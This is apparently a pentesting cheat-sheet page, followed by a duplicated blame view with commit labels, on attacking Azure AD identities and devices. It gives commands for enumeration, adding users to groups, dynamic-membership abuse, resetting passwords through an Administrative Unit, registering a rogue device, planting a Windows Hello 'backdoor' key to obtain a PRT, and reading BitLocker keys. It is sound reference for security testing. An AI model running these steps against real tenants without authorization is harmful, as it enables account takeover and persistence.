InternalAllTheThings/docs/cloud/azure/azure-devices-users-sp.md

# Azure AD IAM

> Root Management Group (Tenant) > Management Group > Subscription > Resource Group > Resource

* Users
* Devices
* Service Principals (Application and Managed Identities)

## Users

* List users: `Get-AzureADUser -All $true`
* Enumerate groups

    ```ps1
    # List groups
    Get-AzureADGroup -All $true
    
    # Get members of a group
    Get-AzADGroup -DisplayName '<GROUP-NAME>'
    Get-AzADGroupMember -GroupDisplayName '<GROUP-NAME>' | select UserPrincipalName
    ```

* Enumerate roles: `Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember`
* List roles: `Get-AzureADMSRoleDefinition | ?{$_.IsBuiltin -eq $False} | select DisplayName`
* Add user to a group

    ```ps1
    $groupid = "<group-id>"
    $targetmember = "<user-id>"
    $group = Get-MgGroup -GroupId $groupid
    $members = Get-MgGroupMember -GroupId $groupid
    New-MgGroupMember -GroupId $groupid -DirectoryObjectid $targetmember
    ```

### Use Credentials

### Dynamic Group Membership

Get groups that allow Dynamic membership: `Get-AzureADMSGroup | ?{$_.GroupTypes -eq 'DynamicMembership'}`

Rule example : `(user.otherMails -any (_ -contains "vendor")) -and (user.userType -eq "guest")`     
Rule description: Any Guest user whose secondary email contains the string 'vendor' will be added to the group

1. Open user's profile, click on **Manage**
2. Click on **Resend** invite and to get an invitation URL
3. Set the secondary email
    ```powershell
    PS> Set-AzureADUser -ObjectId <OBJECT-ID> -OtherMails <Username>@<TENANT NAME>.onmicrosoft.com -Verbose
    ```


### Administrative Unit

Administrative Unit can reset password of another user

```powershell
PS AzureAD> Get-AzureADMSAdministrativeUnit -All $true
PS AzureAD> Get-AzureADMSAdministrativeUnit -Id <ID>
PS AzureAD> Get-AzureADMSAdministrativeUnitMember -Id <ID>
PS AzureAD> Get-AzureADMSScopedRoleMembership -Id <ID> | fl
PS AzureAD> Get-AzureADDirectoryRole -ObjectId <RoleId>
PS AzureAD> Get-AzureADUser -ObjectId <RoleMemberInfo.Id> | fl

PS C:\Tools> $password = "Password" | ConvertToSecureString -AsPlainText -Force
PS C:\Tools> (Get-AzureADUser -All $true | ?{$_.UserPrincipalName -eq "<Username>@<TENANT NAME>.onmicrosoft.com"}).ObjectId | SetAzureADUserPassword -Password $Password -Verbose
```


## Devices

### List Devices

```ps1
Connect-AzureAD
Get-AzureADDevice
$user = Get-AzureADUser -SearchString "username"
Get-AzureADUserRegisteredDevice -ObjectId $user.ObjectId -All $true
```


### Device State

```ps1
PS> dsregcmd.exe /status
+----------------------------------------------------------------------+
| Device State |
+----------------------------------------------------------------------+
 AzureAdJoined : YES
 EnterpriseJoined : NO
 DomainJoined : NO
 Device Name : jumpvm
```


### Join Devices

* [Enroll Windows 10/11 devices in Intune](https://learn.microsoft.com/en-us/mem/intune/user-help/enroll-windows-10-device)


### Register Devices

```ps1
roadtx device -a register -n swkdeviceup
```


### Windows Hello for Business

```ps1
roadtx.exe prtenrich --ngcmfa-drs-auth
roadtx.exe winhello -k swkdevicebackdoor.key
roadtx.exe prt -hk swkdevicebackdoor.key -u <user@domain.lab> -c swkdeviceup.pem -k swkdeviceup.key
roadtx browserprtauth --prt <prt-token> --prt-sessionkey <prt-session-key> --keep-open -url https://portal.azure.com
```


### Bitlocker Keys

```ps1
Install-Module Microsoft.Graph -Scope CurrentUser
Import-Module Microsoft.Graph.Identity.SignIns
Connect-MgGraph -Scopes BitLockerKey.Read.All
Get-MgInformationProtectionBitlockerRecoveryKey -All
Get-MgInformationProtectionBitlockerRecoveryKey -BitlockerRecoveryKeyId $bitlockerRecoveryKeyId
```


# Service Principals


## Other

Lists all the client IDs you can use to get a token with the `mail.read` scope on the Microsoft Graph:

```ps1
roadtx getscope -s https://graph.microsoft.com/mail.read
roadtx findscope -s https://graph.microsoft.com/mail.read
```


## References

* [Pentesting Azure Mindmap](https://github.com/synacktiv/Mindmaps)
PATT Migration - v0.3 2023-11-17 23:46:19 +00:00			`# Azure AD IAM`
PATT Migration - v0.2 2023-11-17 20:29:33 +00:00
			`> Root Management Group (Tenant) > Management Group > Subscription > Resource Group > Resource`

			`* Users`
			`* Devices`
			`* Service Principals (Application and Managed Identities)`

			`## Users`

Enumerate Tenant Informations 2023-11-26 11:44:03 +00:00			* List users: `Get-AzureADUser -All $true`
Devices and Services 2023-11-26 19:40:13 +00:00			`* Enumerate groups`

			```ps1
			`# List groups`
			`Get-AzureADGroup -All $true`

			`# Get members of a group`
			`Get-AzADGroup -DisplayName '<GROUP-NAME>'`
			`Get-AzADGroupMember -GroupDisplayName '<GROUP-NAME>' \| select UserPrincipalName`
			```

Enumerate Tenant Informations 2023-11-26 11:44:03 +00:00			* Enumerate roles: `Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" \| Get-AzureADDirectoryRoleMember`
			* List roles: `Get-AzureADMSRoleDefinition \| ?{$_.IsBuiltin -eq $False} \| select DisplayName`
Folder tree update 2023-11-19 09:38:58 +00:00			`* Add user to a group`
Devices and Services 2023-11-26 19:40:13 +00:00
Folder tree update 2023-11-19 09:38:58 +00:00			```ps1
			`$groupid = "<group-id>"`
			`$targetmember = "<user-id>"`
			`$group = Get-MgGroup -GroupId $groupid`
			`$members = Get-MgGroupMember -GroupId $groupid`
			`New-MgGroupMember -GroupId $groupid -DirectoryObjectid $targetmember`
			```

Enumerate Tenant Informations 2023-11-26 11:44:03 +00:00			`### Use Credentials`

Azure Runbook + Dynamic Membership 2023-11-23 20:17:13 +00:00			`### Dynamic Group Membership`

			Get groups that allow Dynamic membership: `Get-AzureADMSGroup \| ?{$_.GroupTypes -eq 'DynamicMembership'}`

			Rule example : `(user.otherMails -any (_ -contains "vendor")) -and (user.userType -eq "guest")`
			`Rule description: Any Guest user whose secondary email contains the string 'vendor' will be added to the group`

			`1. Open user's profile, click on Manage`
			`2. Click on Resend invite and to get an invitation URL`
			`3. Set the secondary email`
			```powershell
			`PS> Set-AzureADUser -ObjectId <OBJECT-ID> -OtherMails <Username>@<TENANT NAME>.onmicrosoft.com -Verbose`
			```
PATT Migration - v0.2 2023-11-17 20:29:33 +00:00
Pass-the-PRT 2023-11-27 21:27:34 +00:00
			`### Administrative Unit`

			`Administrative Unit can reset password of another user`

			```powershell
			`PS AzureAD> Get-AzureADMSAdministrativeUnit -All $true`
			`PS AzureAD> Get-AzureADMSAdministrativeUnit -Id <ID>`
			`PS AzureAD> Get-AzureADMSAdministrativeUnitMember -Id <ID>`
			`PS AzureAD> Get-AzureADMSScopedRoleMembership -Id <ID> \| fl`
			`PS AzureAD> Get-AzureADDirectoryRole -ObjectId <RoleId>`
			`PS AzureAD> Get-AzureADUser -ObjectId <RoleMemberInfo.Id> \| fl`

			`PS C:\Tools> $password = "Password" \| ConvertToSecureString -AsPlainText -Force`
			`PS C:\Tools> (Get-AzureADUser -All $true \| ?{$_.UserPrincipalName -eq "<Username>@<TENANT NAME>.onmicrosoft.com"}).ObjectId \| SetAzureADUserPassword -Password $Password -Verbose`
			```


PATT Migration - v0.2 2023-11-17 20:29:33 +00:00			`## Devices`

Azure Devops + Devices + Bitlocker 2023-11-22 15:18:40 +00:00			`### List Devices`

			```ps1
			`Connect-AzureAD`
			`Get-AzureADDevice`
			`$user = Get-AzureADUser -SearchString "username"`
			`Get-AzureADUserRegisteredDevice -ObjectId $user.ObjectId -All $true`
			```


Devices and Services 2023-11-26 19:40:13 +00:00			`### Device State`

			```ps1
			`PS> dsregcmd.exe /status`
			`+----------------------------------------------------------------------+`
			`\| Device State \|`
			`+----------------------------------------------------------------------+`
			`AzureAdJoined : YES`
			`EnterpriseJoined : NO`
			`DomainJoined : NO`
			`Device Name : jumpvm`
			```


PATT Migration - v0.2 2023-11-17 20:29:33 +00:00			`### Join Devices`

AAD PRT + Conditional Access Policy 2023-11-20 22:20:18 +00:00			`* [Enroll Windows 10/11 devices in Intune](https://learn.microsoft.com/en-us/mem/intune/user-help/enroll-windows-10-device)`


PATT Migration - v0.2 2023-11-17 20:29:33 +00:00			`### Register Devices`

AAD PRT + Conditional Access Policy 2023-11-20 22:20:18 +00:00			```ps1
			`roadtx device -a register -n swkdeviceup`
			```


			`### Windows Hello for Business`

			```ps1
			`roadtx.exe prtenrich --ngcmfa-drs-auth`
			`roadtx.exe winhello -k swkdevicebackdoor.key`
			`roadtx.exe prt -hk swkdevicebackdoor.key -u <user@domain.lab> -c swkdeviceup.pem -k swkdeviceup.key`
			`roadtx browserprtauth --prt <prt-token> --prt-sessionkey <prt-session-key> --keep-open -url https://portal.azure.com`
			```

PATT Migration - v0.2 2023-11-17 20:29:33 +00:00
Azure Devops + Devices + Bitlocker 2023-11-22 15:18:40 +00:00			`### Bitlocker Keys`

			```ps1
			`Install-Module Microsoft.Graph -Scope CurrentUser`
			`Import-Module Microsoft.Graph.Identity.SignIns`
			`Connect-MgGraph -Scopes BitLockerKey.Read.All`
			`Get-MgInformationProtectionBitlockerRecoveryKey -All`
			`Get-MgInformationProtectionBitlockerRecoveryKey -BitlockerRecoveryKeyId $bitlockerRecoveryKeyId`
			```
Evilginx Phishlet 2023-11-21 22:34:26 +00:00

Azure Devops + Devices + Bitlocker 2023-11-22 15:18:40 +00:00			`# Service Principals`

Evilginx Phishlet 2023-11-21 22:34:26 +00:00
Azure Devops + Devices + Bitlocker 2023-11-22 15:18:40 +00:00			`## Other`
Evilginx Phishlet 2023-11-21 22:34:26 +00:00
			Lists all the client IDs you can use to get a token with the `mail.read` scope on the Microsoft Graph:

			```ps1
			`roadtx getscope -s https://graph.microsoft.com/mail.read`
			`roadtx findscope -s https://graph.microsoft.com/mail.read`
			```
Azure Devops + Devices + Bitlocker 2023-11-22 15:18:40 +00:00

			`## References`

			`* [Pentesting Azure Mindmap](https://github.com/synacktiv/Mindmaps)`